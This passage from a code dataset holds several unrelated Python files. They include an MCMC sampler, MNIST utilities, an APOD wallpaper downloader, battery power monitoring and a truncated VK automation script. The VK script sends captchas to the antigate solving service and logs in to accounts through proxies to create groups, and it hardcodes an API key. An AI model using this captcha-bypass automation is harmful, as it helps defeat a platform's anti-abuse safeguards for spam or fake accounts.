request.data.get('key')\n\n # get the parent fields from the model\n try:\n parent_fields = instance.parent_fields\n parent_ids = [request.data.get(parent_field) for parent_field in parent_fields]\n except AttributeError:\n parent_fields = parent_ids = []\n\n # get the original and the original_serializer\n original = self.get_object()\n original_serializer = self.get_serializer(original)\n\n # merge the original_serializer with the data from the request and validate\n data = original_serializer.data\n data.update({\n 'uri_prefix': uri_prefix,\n 'key': key\n })\n for parent_field, parent_id in zip(parent_fields, parent_ids):\n data[parent_field] = parent_id\n validation_serializer = self.get_serializer(data=data)\n validation_serializer.is_valid(raise_exception=True)\n\n # perform the copy on the database\n parents = []\n for parent_field, parent_id in zip(parent_fields, parent_ids):\n parent_model = instance._meta.get_field(parent_field).remote_field.model\n parent = parent_model.objects.filter(pk=parent_id).first()\n parents.append(parent)\n instance.copy(uri_prefix, key, *parents)\n\n # the rest is similar to CreateModelMixin.create()\n serializer = self.get_serializer(instance)\n headers = self.get_success_headers(serializer.data)\n return Response(serializer.data, status=status.HTTP_201_CREATED, headers=headers)\n","sub_path":"rdmo/core/viewsets.py","file_name":"viewsets.py","file_ext":"py","file_size_in_byte":2927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"374380566","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Feb 23 12:45:06 2016\n\n@author: Mark\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport time\n\nclass MCMCLog(object):\n \"\"\"\n Stores results of MCMC samplers\n \"\"\"\n def __init__(self, sampler=None):\n self.sampler = sampler\n self.state_history = []\n self.accepts = []\n self.times = []\n self.start_time = 0\n self.accept_ratio = 0\n\n def initialise(self):\n \"\"\"\n Record time at which MCMC routine began\n \"\"\"\n self.start_time = time.time()\n\n def record(self, acceptance, new_x, new_p):\n \"\"\"\n Stores the new state, acceptance result and elapsed time of a single step of MCMC\n \"\"\"\n self.state_history.append(np.copy(new_x))\n self.accepts.append(acceptance)\n self.times.append(time.time() - self.start_time)\n \n def summary(self):\n \"\"\"\n Prints a summary of the MCMC routine to stdout\n \"\"\"\n print('---------- GHMC SAMPLER ----------')\n print('Time taken: {}'.format(self.times[-1]))\n print('Markov chain steps simulated: {}'.format(len(self.state_history)))\n print('Acceptance ratio: {}'.format(float(np.sum(self.accepts))/len(self.accepts)))\n self.accept_ratio = float(np.sum(self.accepts))/len(self.accepts)\n \n def plot(self, start=0, lines=False):\n \"\"\"\n For use when targeting 2D densities - plots scatter diagram of samples\n \"\"\"\n # Samples\n if not lines:\n plt.scatter([s[0] for s in self.state_history[start:]], [s[1] for s in self.state_history[start:]])\n else:\n plt.plot([s[0] for s in self.state_history[start:]], [s[1] for s in self.state_history[start:]], '.r-')\n # Contour of potential\n xlow, xhigh = plt.gca().get_xlim()\n x_range = xhigh-xlow\n xhigh += x_range*0.1\n xlow -= x_range*0.1\n ylow, yhigh = plt.gca().get_ylim()\n y_range = yhigh-ylow\n yhigh += y_range*0.1\n ylow += y_range*0.1\n xdelta = x_range/80.0\n ydelta = y_range/80.0\n x = np.arange(xlow, xhigh, xdelta)\n y = np.arange(ylow, yhigh, ydelta)\n X, Y = np.meshgrid(x, y)\n potential = np.empty(X.shape)\n for i in range(potential.shape[0]):\n for j in range(potential.shape[1]):\n potential[i,j] = self.sampler.H(np.array([X[i,j], Y[i,j]]), np.array([0, 0]))\n plt.contour(X, Y, potential)\n plt.gca().set_xlim([xlow, xhigh])\n plt.gca().set_ylim([ylow, yhigh])\n plt.grid()\n\nclass GHMCSampler(object):\n def __init__(self, density, A):\n \"\"\"\n Stores the Hamiltonian and gradient of the Hamiltonian, as well as the\n matrix A controlling the GHMC dynamics\n \"\"\"\n self.density = density\n self.H = self.density.total_E\n self.grad_H = self.density.total_grad_E\n self.A = A\n \n # GHMC parameters\n self.dim = len(self.A)//2\n assert (type(self.dim) is int) \n self.C = self.A[:self.dim, self.dim:]\n self.minusC_T = self.A[self.dim:, :self.dim]\n self.D = self.A[self.dim:, self.dim:]\n self.non_zero_D = np.any(self.D)\n \n # State variables\n self.x = np.zeros(self.dim)\n self.p = np.zeros(self.dim)\n \n # D-matrix parameters\n if self.non_zero_D:\n self.D_diag, self.D_unitary, = np.linalg.eig(self.D)\n self.D_unitary_inv = np.linalg.inv(self.D_unitary)\n # Check that D is invertible\n assert not (self.D_diag==0).any()\n self.D_inv = np.linalg.inv(self.D)\n \"\"\" Look into whether there's any way around setting imaginary part to 0 in line below \"\"\"\n self.exp_D = np.real(np.dot(self.D_unitary, np.dot(np.diag(np.exp(self.D_diag)), self.D_unitary_inv)))\n self.cached_stepsize = 0\n self.exp_eD = np.zeros((self.dim, self.dim))\n \n # Log\n self.log = MCMCLog(self)\n \n def _sample_momentum(self):\n \"\"\"\n Implements resampling of the momentum variable\n Other possibilites are allowing momentum to follow a Markov chain itself\n \"\"\"\n return np.random.multivariate_normal(mean=np.zeros(self.dim), cov=np.identity(self.dim))\n\n def leapfrog_flow(self, x, p, stepsize, num_steps):\n \"\"\"\n Implements a full leapfrog flow with starting position and momentum given\n by x and p respectively\n \"\"\"\n # Check whether exp_eD is cached for desired stepsize, if not recalculate exp_eD\n if self.non_zero_D:\n if not stepsize == self.cached_stepsize:\n self.cached_stepsize = stepsize\n self.exp_eD = np.dot(self.D_unitary, np.dot(np.diag(np.exp(stepsize*self.D_diag)), self.D_unitary_inv))\n \"\"\" Extract real part so that computations can continue - LOOK INTO THIS \"\"\"\n self.exp_eD = np.real(self.exp_eD)\n \n # First half-step for H_1\n p += (stepsize/2.0) * np.dot(self.minusC_T, self.grad_H(x, p)[:self.dim])\n \n # Then alternately update H_2 and H_1 flows\n for it in range(num_steps-1):\n # H_2 flow\n self._H2_flow(x, p, self.non_zero_D, stepsize)\n # H_1 flow\n p += stepsize * np.dot(self.minusC_T, self.grad_H(x, p)[:self.dim])\n \n # Final H_2 step\n self._H2_flow(x, p, self.non_zero_D, stepsize)\n # Final H_1 half-step\n p += (stepsize / 2.0) * np.dot(self.minusC_T, self.grad_H(x, p)[:self.dim])\n \n return x, p\n \n def _H2_flow(self, x, p, non_zero_D, stepsize):\n \"\"\"\n Implements the flow for the sub-Hamiltonian H_2 in two cases: D=0, and \n D invertible + antisymmetric\n \n x and p are modified in place to reduce costs of creating new numpy arrays\n \"\"\"\n if non_zero_D:\n x += np.dot(self.C, np.dot(self.D_inv , np.dot((self.exp_eD - np.identity(self.dim)), self.grad_H(x, p)[self.dim:])))\n p += np.dot(self.exp_eD - np.identity(self.dim), self.grad_H(x, p)[self.dim:])\n return\n if not non_zero_D:\n x += stepsize * np.dot(self.C, self.grad_H(x, p)[self.dim:])\n return\n \n def sample(self, time_units, stepsize, num_steps, initial_x=None):\n \"\"\"\n Runs a full MCMC routine\n \"\"\"\n # Setup\n self.log.initialise()\n if initial_x is None:\n initial_x = np.zeros(self.dim)\n self.x = initial_x\n \n for t in range(time_units):\n # Propose new state\n self.p = self._sample_momentum()\n proposed_p = np.copy(self.p)\n proposed_x = np.copy(self.x)\n self.leapfrog_flow(proposed_x, proposed_p, stepsize, num_steps)\n # Acceptance test\n accept = (np.random.uniform() < np.exp(-self.H(proposed_x, proposed_p)+self.H(self.x, self.p)))\n if accept:\n self.x = np.copy(proposed_x)\n self.p = np.copy(proposed_p)\n else:\n pass\n # Make log of most recent step\n self.log.record(accept, self.x, self.p)\n \n # Print summary of Markov chain simulation\n self.log.summary()\n \n# TESTING\nif __name__ == \"__main__\":\n pass","sub_path":"Code/Sampler.py","file_name":"Sampler.py","file_ext":"py","file_size_in_byte":7449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"138883358","text":"import struct\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport math\n\n\ndef gamma(n):\n return factorial(n - 1)\n\n\ndef beta_pdf(p, a, b):\n return (p**(a - 1)) * ((1 - p)**(b - 1)) * (gamma(a + b) / (gamma(a) * gamma(b)))\n\n\ndef factorial(n):\n result = 1\n for x in range(1, n + 1):\n result *= x\n return result\n\n\ndef nCr(n, r):\n return factorial(n) / (factorial(r) * factorial(n - r))\n\n\ndef load_mnist(train=True):\n if train:\n imgs = read_mnist_img(file_name='data/train-images.idx3-ubyte')\n labels = read_mnist_label(file_name='data/train-labels.idx1-ubyte')\n else:\n imgs = read_mnist_img(file_name='data/t10k-images.idx3-ubyte')\n labels = read_mnist_label(file_name='data/t10k-labels.idx1-ubyte')\n return imgs, labels\n\n\ndef read_mnist_img(file_name):\n with open(file_name, 'rb') as f:\n magic_number, num_imgs = struct.unpack('>ii', f.read(8))\n n_row, n_col = struct.unpack('>ii', f.read(8))\n imgs = np.zeros((num_imgs, n_row, n_col))\n for i in range(num_imgs):\n for row in range(n_row):\n for col in range(n_col):\n value = struct.unpack('>B', f.read(1))[0]\n imgs[i][row][col] = value\n return imgs\n\n\ndef read_mnist_label(file_name):\n with open(file_name, 'rb') as f:\n magic_number, num_labels = struct.unpack('>ii', f.read(8))\n labels = np.zeros(num_labels).astype(np.int32)\n for i in range(num_labels):\n value = struct.unpack('>B', f.read(1))[0]\n labels[i] = int(value)\n return labels\n\n\ndef test_load_minst():\n imgs, labels = load_mnist(train=True)\n print(imgs.shape, labels.shape)\n img = imgs[0]\n title = labels[0]\n print(title)\n plt.imshow(img, cmap='gray'), plt.title(title)\n plt.show()\n\n\ndef argmax(list_):\n return max(enumerate(list_), key=lambda x: x[1])[0]\n\n\n# class Feature_Bins():\n\n# def __init__(self, n_bins=32, id='', min_count=10, min_value=0, max_value=256):\n# self.bins = [min_count for x in range(n_bins)]\n# self.id = id\n# self.min = min_value\n# self.max = max_value\n\n# def pseudocount(self, min_count=10):\n# ''' avoid empty bin '''\n# for i, count in enumerate(self.bins):\n# if count < min_count:\n# diff = min_count - count\n# self.bins[i] = min_count\n# self.bins[argmax(self.bins)] -= diff\n# return self\n\n# def get_bin_num(self, value):\n# interval = (self.max - self.min) // len(self.bins)\n# c = value // interval\n# return c\n\n# def to_bin(self, value):\n# interval = (self.max - self.min) // len(self.bins)\n# c = value // interval\n# self.bins[int(c)] += 1\n\n# def get_count(self, bin_num):\n# return self.bins[int(bin_num)]\n\n# def total_count(self):\n# return sum(self.bins)\n\n# def __len__(self):\n# return len(self.bins)\n\n# ''' define what will A[i] return '''\n\n# def __getitem__(self, key):\n# return self.bins[key]\n\n# ''' define what will happen when A[i] = k is called '''\n\n# def __setitem__(self, key, value):\n# self.bins[key] = value\n\n# def __str__(self):\n# s = 'Feature Bins %s \\n' % (self.id)\n# num_space = [max(len(str(i)), len(str(count))) + 1 for i, count in enumerate(self.bins)]\n# first_line = ['{bin_id:>{width}}'.format(\n# bin_id=i, width=num_space[i]) for i in range(len(self.bins))]\n# second_line = ['{bin_count:>{width}}'.format(bin_count=count, width=num_space[\n# i]) for i, count in enumerate(self.bins)]\n# s += ''.join(first_line) + '\\n'\n# s += ''.join(second_line) + '\\n'\n# return s\n\n\ndef print_probs(probs):\n first_line = ['{label:>5}'.format(label=i) for i in range(len(probs))]\n second_line = ['{prob:>5}'.format(prob='%.2f' % prob) for prob in probs]\n s = '{head:<6}'.format(head='Label') + ''.join(first_line) + '\\n'\n s += '{head:<6}'.format(head='Prob') + ''.join(second_line) + '\\n'\n print(s)\n\n\nclass Gaussian():\n\n def __init__(self, id='', smooth=0.01):\n self.num_data = 0\n self.sum_of_square = 0\n self.sum_of_data = 0\n self.id = id\n self.smooth = smooth\n\n def update(self, data):\n self.num_data += 1\n self.sum_of_data += data\n self.sum_of_square += data**2\n\n @property\n def mean(self):\n if self.num_data == 0:\n return 0.0\n return self.sum_of_data / self.num_data\n\n @property\n def variance(self):\n ''' Var = 平方平均 - 平方平均 '''\n if self.num_data == 0:\n return 0.0\n return (self.sum_of_square / self.num_data) - (self.mean**2) + self.smooth\n\n @property\n def std(self):\n return self.variance ** (1 / 2)\n\n def pdf(self, x):\n p = 1 / (self.std * math.sqrt(2 * math.pi)) * \\\n math.exp((-1 / 2) * ((x - self.mean) / self.std)**2)\n if p < 0.00001:\n print('Data = %d, Mean = %2.f, Var = %.2f, Prob = %f' %\n (x, self.mean, self.variance, p))\n return max(0.0000001, p)\n\n def logpdf(self, x):\n return (-1 / 2) * math.log(2 * math.pi * self.variance) + -1 * ((x - self.mean)**2 / (2 * (self.variance**2)))\n\n def distance(self, data):\n return ((data - self.mean) / self.std)\n\n def __str__(self):\n s = 'Gaussian %s\\n' % (self.id)\n s += 'Mean = %.2f, Variance= %.2f (#data=%d)' % (self.mean, self.variance, self.num_data)\n return s\n\n\ndef img_to_vector(imgs):\n N, dims = imgs.shape[0], imgs.shape[1:]\n dim = 1\n for d in dims:\n dim *= d\n X = np.reshape(imgs, (N, dim))\n return X\n\nif __name__ == '__main__':\n # f1 = Feature_Gaussian()\n # f1.update(-1)\n # f1.update(1)\n # print(f1.mean)\n # print(f1.variance)\n # print(f1.log_pdf(50))\n # import scipy.stats\n # print(scipy.stats.norm(0, 1).logpdf(50))\n X = img_to_vector(np.zeros((10, 28, 28)))\n print(X.shape)\n","sub_path":"2_Naive-Bayes/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"129896456","text":"# -*- coding: utf-8 -*-\n\n\"\"\" Downloads APOD picture \"\"\"\n\nimport os\n\nimport wget\nfrom hal.internet.web import Webpage\nfrom jplib.desktop.gnome3 import set_wallpaper\n\nAPOD_ROOT = \"https://apod.nasa.gov/apod/\"\nAPOD_URL = APOD_ROOT + \"astropix.html\"\nDOWNLOAD_FOLDER = os.path.join(\n os.getenv(\"HOME\"),\n \"Pictures\",\n \"apod\"\n)\n\n\ndef get_apod_url(url):\n \"\"\"\n :param url: str\n Search image in this page\n :return: str\n Url of APOD picture\n \"\"\"\n\n w = Webpage(url)\n w.get_html_source() # download web page\n images = w.soup.find_all(\"img\")\n if images and images[0]:\n return os.path.join(\n os.path.dirname(url), # server root\n images[0][\"src\"].strip()\n )\n else:\n return None\n\n\ndef download_apod(download_folder):\n \"\"\"\n :param download_folder: str\n Path to existing folder where to download image\n :return: void\n Downloads image to folder\n \"\"\"\n\n image_url = get_apod_url(APOD_URL)\n if image_url:\n download_path = os.path.join(\n download_folder,\n os.path.basename(image_url) # image name\n )\n if not os.path.exists(download_path): # download if needed\n wget.download(image_url, download_path)\n\n return download_path\n\n\ndef main():\n if not os.path.exists(DOWNLOAD_FOLDER): # create download folder if needed\n os.makedirs(DOWNLOAD_FOLDER)\n\n download_path = download_apod(DOWNLOAD_FOLDER)\n print(\"Downloaded APOD image\")\n set_wallpaper(download_path)\n print(\"Set as wallpaper\")\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"internet/download_apod.py","file_name":"download_apod.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"435420203","text":"import datetime\nimport random\nimport threading\nimport time\nfrom statistics import mean\n\nfrom cereal import log\nfrom selfdrive.swaglog import cloudlog\n\nPANDA_OUTPUT_VOLTAGE = 5.28\n\n\n# Parameters\ndef get_battery_capacity():\n return _read_param(\"/sys/class/power_supply/battery/capacity\", int)\n\n\ndef get_battery_status():\n # This does not correspond with actual charging or not.\n # If a USB cable is plugged in, it responds with 'Charging', even when charging is disabled\n return _read_param(\"/sys/class/power_supply/battery/status\", lambda x: x.strip(), '')\n\n\ndef get_battery_current():\n return _read_param(\"/sys/class/power_supply/battery/current_now\", int)\n\n\ndef get_battery_voltage():\n return _read_param(\"/sys/class/power_supply/battery/voltage_now\", int)\n\n\ndef get_usb_present():\n return _read_param(\"/sys/class/power_supply/usb/present\", lambda x: bool(int(x)), False)\n\n\ndef get_battery_charging():\n # This does correspond with actually charging\n return _read_param(\"/sys/class/power_supply/battery/charge_type\", lambda x: x.strip() != \"N/A\", False)\n\n\ndef set_battery_charging(on):\n with open('/sys/class/power_supply/battery/charging_enabled', 'w') as f:\n f.write(f\"{1 if on else 0}\\n\")\n\n\n# Helpers\ndef _read_param(path, parser, default=0):\n try:\n with open(path) as f:\n return parser(f.read())\n except Exception:\n return default\n\n\ndef panda_current_to_actual_current(panda_current):\n # From white/grey panda schematic\n return (3.3 - (panda_current * 3.3 / 4096)) / 8.25\n\n\nclass PowerMonitoring:\n def __init__(self):\n self.last_measurement_time = None # Used for integration delta\n self.power_used_uWh = 0 # Integrated power usage in uWh since going into offroad\n self.next_pulsed_measurement_time = None\n self.integration_lock = threading.Lock()\n\n # Calculation tick\n def calculate(self, health):\n try:\n now = time.time()\n\n # Check that time is valid\n if datetime.datetime.fromtimestamp(now).year < 2019:\n return\n\n # Only integrate when there is no ignition\n # If health is None, we're probably not in a car, so we don't care\n if health is None or (health.health.ignitionLine or health.health.ignitionCan) or \\\n health.health.hwType == log.HealthData.HwType.unknown:\n with self.integration_lock:\n self.last_measurement_time = None\n self.next_pulsed_measurement_time = None\n self.power_used_uWh = 0\n return\n\n # First measurement, set integration time\n with self.integration_lock:\n if self.last_measurement_time is None:\n self.last_measurement_time = now\n return\n\n is_uno = health.health.hwType == log.HealthData.HwType.uno\n # Get current power draw somehow\n current_power = 0\n if get_battery_status() == 'Discharging':\n # If the battery is discharging, we can use this measurement\n # On C2: this is low by about 10-15%, probably mostly due to UNO draw not being factored in\n current_power = ((get_battery_voltage() / 1000000) * (get_battery_current() / 1000000))\n elif (health.health.hwType in [log.HealthData.HwType.whitePanda, log.HealthData.HwType.greyPanda]) and (health.health.current > 1):\n # If white/grey panda, use the integrated current measurements if the measurement is not 0\n # If the measurement is 0, the current is 400mA or greater, and out of the measurement range of the panda\n # This seems to be accurate to about 5%\n current_power = (PANDA_OUTPUT_VOLTAGE * panda_current_to_actual_current(health.health.current))\n elif (self.next_pulsed_measurement_time is not None) and (self.next_pulsed_measurement_time <= now):\n # TODO: Figure out why this is off by a factor of 3/4???\n FUDGE_FACTOR = 1.33\n\n # Turn off charging for about 10 sec in a thread that does not get killed on SIGINT, and perform measurement here to avoid blocking thermal\n def perform_pulse_measurement(now):\n try:\n set_battery_charging(False)\n time.sleep(5)\n\n # Measure for a few sec to get a good average\n voltages = []\n currents = []\n for i in range(6):\n voltages.append(get_battery_voltage())\n currents.append(get_battery_current())\n time.sleep(1)\n current_power = ((mean(voltages) / 1000000) * (mean(currents) / 1000000))\n\n self._perform_integration(now, current_power * FUDGE_FACTOR)\n\n # Enable charging again\n set_battery_charging(True)\n except Exception:\n cloudlog.exception(\"Pulsed power measurement failed\")\n\n # Start pulsed measurement and return\n threading.Thread(target=perform_pulse_measurement, args=(now,)).start()\n self.next_pulsed_measurement_time = None\n return\n\n elif self.next_pulsed_measurement_time is None and not is_uno:\n # On a charging EON with black panda, or drawing more than 400mA out of a white/grey one\n # Only way to get the power draw is to turn off charging for a few sec and check what the discharging rate is\n # We shouldn't do this very often, so make sure it has been some long-ish random time interval\n self.next_pulsed_measurement_time = now + random.randint(120, 180)\n return\n else:\n # Do nothing\n return\n\n # Do the integration\n self._perform_integration(now, current_power)\n except Exception:\n cloudlog.exception(\"Power monitoring calculation failed\")\n\n def _perform_integration(self, t, current_power):\n with self.integration_lock:\n try:\n if self.last_measurement_time:\n integration_time_h = (t - self.last_measurement_time) / 3600\n power_used = (current_power * 1000000) * integration_time_h\n if power_used < 0:\n raise ValueError(f\"Negative power used! Integration time: {integration_time_h} h Current Power: {power_used} uWh\")\n self.power_used_uWh += power_used\n self.last_measurement_time = t\n except Exception:\n cloudlog.exception(\"Integration failed\")\n\n # Get the power usage\n def get_power_used(self):\n return int(self.power_used_uWh)\n","sub_path":"selfdrive/thermald/power_monitoring.py","file_name":"power_monitoring.py","file_ext":"py","file_size_in_byte":6251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"100147466","text":"from __future__ import print_function\nfrom snowflake.nodes import StencilComponent, SparseWeightArray\nfrom snowflake.vector import Vector\nfrom hpgmg.finite_volume.operators.kernels.base_kernel import BaseKernel\n\n__author__ = 'nzhang-dev'\n\n\nclass VonNeumannStencil(BaseKernel):\n def __init__(self, dimensions, a, b, h2inv):\n self.dimensions = dimensions\n self.b = b\n self.a = a\n self.h2inv = h2inv\n\n\nclass VariableCoefficientVonNeumannStencil(VonNeumannStencil):\n def get_stencil(self):\n alpha_component = StencilComponent('alpha', SparseWeightArray({(0,)*self.dimensions: 1}))\n mesh_primary = StencilComponent('mesh', SparseWeightArray({(0,)*self.dimensions: 1}))\n scale_factor = self.a * alpha_component * mesh_primary - self.b * self.h2inv\n forward_facing_components = []\n backward_facing_components = []\n zero_vec = Vector.zero_vector(self.dimensions)\n for dim in range(self.dimensions):\n beta_back = StencilComponent('beta_{}'.format(dim), SparseWeightArray({zero_vec: 1}))\n mesh_back = StencilComponent('mesh', SparseWeightArray({\n -Vector.unit_vector(dim, self.dimensions): 1,\n zero_vec: -1\n }))\n beta_forwards = StencilComponent('beta_{}'.format(dim), SparseWeightArray({\n Vector.unit_vector(dim, self.dimensions): 1\n }))\n mesh_forwards = StencilComponent('mesh',SparseWeightArray({\n Vector.unit_vector(dim, self.dimensions): 1,\n zero_vec: -1\n }))\n forward_facing_components.append(beta_back * mesh_back)\n backward_facing_components.append(beta_forwards * mesh_forwards)\n total = scale_factor * sum(forward_facing_components + backward_facing_components)\n return total\n\nclass ConstantCoefficientVonNeumannStencil(VonNeumannStencil):\n def get_stencil(self):\n #print(self.a, self.b, self.h2inv)\n a_component = self.a * StencilComponent('mesh',\n SparseWeightArray({Vector.zero_vector(self.dimensions): 1}))\n von_neumann_points = list(Vector.von_neumann_vectors(self.dimensions, radius=1, closed=False))\n weights = {point: 1 for point in von_neumann_points}\n weights[Vector.zero_vector(self.dimensions)] = -len(von_neumann_points)\n b_component = self.b * self.h2inv * StencilComponent('mesh', SparseWeightArray(weights))\n return a_component - b_component","sub_path":"hpgmg/finite_volume/operators/kernels/von_neumann.py","file_name":"von_neumann.py","file_ext":"py","file_size_in_byte":2527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"389789703","text":"class Solution(object):\n def twoSum(self, numbers, target):\n \"\"\"\n :type numbers: List[int]\n :type target: int\n :rtype: List[int]\n \"\"\"\n count_dict = dict()\n for i in xrange(len(numbers)):\n if numbers[i] in count_dict.keys():\n return [count_dict[numbers[i]]+1, i+1]\n\n else:\n count_dict[target-numbers[i]] = count_dict.get(numbers[i], i)\n\n # print count_dict\n\n\n# sol = Solution()\n# inp = [2, 7, 11, 15]\n# target = 9\n# print sol.twoSum(inp, target)","sub_path":"Algorithms/167_Two_Sum_2_Input_array_sorted/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"520293259","text":"#!/usr/bin/env python3\n\n# --------------------- #\n# -- SEVERAL IMPORTS -- #\n# --------------------- #\n\nimport json\n\nfrom mistool.os_use import PPath\n\n\n# ------------------- #\n# -- MODULE TESTED -- #\n# ------------------- #\n\nfrom orpyste import section\n\n\n# ----------------------- #\n# -- GENERAL CONSTANTS -- #\n# ----------------------- #\n\nTHIS_DIR = PPath(__file__).parent\nDATAS_DIR = THIS_DIR / \"datas_for_tests\"\n\nREAD_SECTION_CLASS = section.Read\n\n\n# --------------- #\n# -- CLEANINGS -- #\n# --------------- #\n\ndef test_data_read_all():\n for jsonpath in DATAS_DIR.walk(\"file::search/**.json\"):\n with jsonpath.open() as f:\n jsoninfos = json.load(f)\n\n mode = jsoninfos[\"mode\"]\n search = jsoninfos[\"search\"]\n\n with READ_SECTION_CLASS(\n content = jsonpath.with_ext(\"peuf\"),\n mode = mode\n ) as data_infos:\n for querypath, nblines in search.items():\n nblinesfound = []\n\n for oneinfo in data_infos[querypath]:\n if oneinfo.isblock():\n nblinesfound.append(oneinfo.nbline)\n\n print(jsonpath, \"--->\", querypath, \":\", nblinesfound)\n\n assert nblines == nblinesfound\n","sub_path":"test/data/test_data_search.py","file_name":"test_data_search.py","file_ext":"py","file_size_in_byte":1243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"15513959","text":"from readFromFile import parsedata\nfrom writeTofile import saveTofile\n\nfiles = ['a_example.txt', 'b_read_on.txt', 'c_incunabula.txt',\n 'd_tough_choices.txt', 'e_so_many_books.txt', 'f_librabries_of_the_world.txt']\nfor currentFile in files:\n currentFile0 = \"books/\" + currentFile\n totalBooks, totalLibraries, totalDays, scores, libraries = parsedata(\n currentFile0)\n\n libraries.sort(key=lambda x: x.tRatio, reverse=True)\n currentFile1 = \"solutions/\" + currentFile\n saveTofile(currentFile1, libraries)\n","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"136714646","text":"from selenium.webdriver.common.keys import Keys\nimport webbrowser\nimport re\nimport os\nimport json\nimport requests\nimport random\nimport selenium\nfrom robobrowser import RoboBrowser\nimport time\n\n\nclass vk_captcha:\n\t\"\"\"Класс для работы с каптчей. Вырезает img со страницы, отправляет \n\tв antigate, получает результат, возвращает введенную каптчу в виде строки\"\"\"\n\n\tdef decode(page, root_path):\n\t\t\"\"\"Объединение функций _send_captcha и _check_captcha\"\"\"\n\t\tprint(\"Каптча...\")\n\n\t\tkey = \"4517fb23f10056ec2141bba9a7a158e6\"\n\t\ta_captchaID = vk_captcha._send_captcha(page, root_path, key) #antigate captcha ID [OK, 406704123]\n\t\tif a_captchaID[0] != \"OK\":\n\t\t\tprint(\"Неудалось отправить запрос на antigate\\n%s\" % a_captchaID)\n\t\t\treturn 0\n\t\twhile True:\n\t\t\ttime.sleep(7)\n\t\t\ta_captchaRESULT = vk_captcha._check_captcha(a_captchaID[1], key) #antigate captcah RESULT [OK, Fgv4Kl]\n\t\t\tif a_captchaRESULT[0] != \"OK\":\n\t\t\t\tcontinue\n\t\t\tprint(\"Готово. %s\" % a_captchaRESULT[1])\n\t\t\treturn a_captchaRESULT[1]\n\t\t\n\n\tdef _send_captcha(page, root_path, key):\n\t\t\"\"\"Получает страницу, возвращает массив формата [OK, 406704123]\"\"\"\n\t\timg_tag = page.find(id=\"captcha\") \n\t\tif not img_tag:\n\t\t\timg_tag = page.find(\"img\", {\"class\":\"captcha_img\"})\n\t\tif not img_tag:\n\t\t\tprint(\"Тега с id=captcha не найдено\")\n\t\t\treturn 0\n\t\timg = vk_captcha.request_with_retry(root_path + img_tag[\"src\"]).content\n\t\tdata = {\n\t\t\t\"key\": key,\n\t\t\t\"method\": \"post\",\n\t\t}\n\t\tresponse = vk_captcha.request_with_retry('http://antigate.com/in.php', data=data, files={\"file\": img}) \n\t\treturn (response.text.split(\"|\"))\n\n\tdef _check_captcha(captcha_id, key):\n\t\tresponse = vk_captcha.request_with_retry(\"http://antigate.com/res.php?key=\" + key + \"&action=get&id=\" + captcha_id)\n\t\treturn (response.text.split('|'))\n\n\tdef request_with_retry(url, data=\"\", files=\"\"):\n\t\tTIMEOUT = 0.5\n\t\twhile True:\n\t\t\ttry:\n\t\t\t\tif data or files:\n\t\t\t\t\tresponse = requests.post(url, data=data, files=files, timeout=TIMEOUT)\n\t\t\t\telse:\n\t\t\t\t\tresponse = requests.get(url, timeout=TIMEOUT)\n\t\t\texcept requests.exceptions.ReadTimeout:\n\t\t\t\tcontinue\n\t\t\tbreak\n\t\treturn response\n\t\n\nclass vk_session:\n\tdef __init__(self, root_path, proxy=\"\", cookies=\"\"):\n\t\tself.is_signed = False\n\t\tself.proxy = proxy\n\t\tself.root_path = root_path\n\t\tsession = requests.session()\n\t\tif proxy:\n\t\t\tsession.proxies.update({'http': 'http://' + proxy, 'ssl': proxy ,'https': 'https://' + proxy})\n\t\theaders = {\n\t\t\t\"ACCEPT\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\",\n\t\t\t\"ACCEPT_ENCODING\": \"gzip, deflate, sdch\",\n\t\t\t\"ACCEPT_LANGUAGE\": \"ru-RU,ru;\",\n\t\t\t\"CONNECTION\": \"keep-alive\",\n\t\t\t\"REFERER\": root_path,\n\t\t\t\"UPGRADE_INSECURE_REQUESTS\": \"1\",\n\t\t\t'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36',\n\t\t}\n\t\tsession.headers = headers\n\t\tif cookies:\n\t\t\tsession.cookies = cookies\n\t\tself.browser = RoboBrowser(session=session, timeout=4, history=False)\n\n\tdef connect(self):\n\t\t\n\t\tself.browser.open(self.root_path) \t\n\t\tprint(\"connected\")\n\n\t\t\n\tdef sign_in(self, username, password, captcha):\n\t\ttry:\n\t\t\tform = self.browser.get_forms()[0]\n\n\t\t\tform[\"email\"] = username\n\t\t\tform[\"pass\"] = password\n\t\t\tif captcha:\n\t\t\t\tform[\"captcha_key\"] = vk_captcha.decode(page=self.browser.parsed, root_path=self.root_path)\n\t\t\tself.browser.submit_form(form)\n\t\texcept:\n\t\t\tprint(username)\n\t\t\traise\n\n\tdef create_new_group(self, name, group_type, public_type):\n\t\tself.browser.open(\"https://m.vk.com/groups?act=new\")\n\t\tform = self.browser.get_forms()[0]\n\t\tform[\"title\"] = name\n\t\tform[\"type\"] = group_type\n\t\tform[\"public_type\"] = public_type\n\t\tself.browser.submit_form(form)\n\t\ttime.sleep(1)\n\n\tdef enter_captcha(self):\n\t\tform = 